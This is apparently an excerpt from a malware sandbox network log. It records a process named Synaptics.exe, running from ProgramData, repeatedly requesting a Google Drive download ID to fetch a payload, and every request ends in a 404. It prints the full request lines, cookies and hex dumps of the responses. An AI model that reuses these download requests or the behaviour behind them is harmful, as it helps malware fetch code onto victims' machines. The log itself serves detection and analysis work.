                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:21 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:21 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 53 54 47 4b 43 68 44 43 52 47 77 32 41 52 49 36 41 65 66 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="vSTGKChDCRGw2ARI6AefOQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:21 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      58192.168.2.549826142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:21 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-CzJuW3_1V5bZtsc3d-vBvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      59192.168.2.549827142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:21 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:21 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SyAKY5iRRf32fEA-iHwbBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      60192.168.2.549834142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:22 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:22 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5XXbI-vE8QyrFx0mNffaOVDhpDMQ93tGeLEpt8P0RNfBbVSsZP4QIlP400FUznQcM3
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:22 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RWIuIJr2itQKpTqFlt0DRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:22 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:22 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5f 6f 67 62 48 75 72 51 62 42 6c 67 31 55 58 54 6a 63 6f 79 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="_ogbHurQbBlg1UXTjcoyAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:22 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      61192.168.2.549835142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:22 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:22 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-0g2PThPSBIq2jv84aoziZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      62192.168.2.549837142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:22 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:22 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5Tfmin-xJHMPsXKvU440hGWC3EKIfnkTfHdVWT42uKnOo-Pfl4710PAJaB2xAbqUM5zKbzwyQ
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:22 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-xR1V8mR_Ph1vVYEWdBRfNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:22 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:22 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 4a 51 30 6a 79 61 77 32 6e 46 32 65 53 35 38 57 31 36 74 6d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="CJQ0jyaw2nF2eS58W16tmw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:22 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      63192.168.2.549836142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:22 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:22 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-N7HIdsWN8awu6PlDN-ecFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      64192.168.2.549849142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:23 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:23 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9Hf4vMjTcp0R8uumOMPd5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      65192.168.2.549850142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
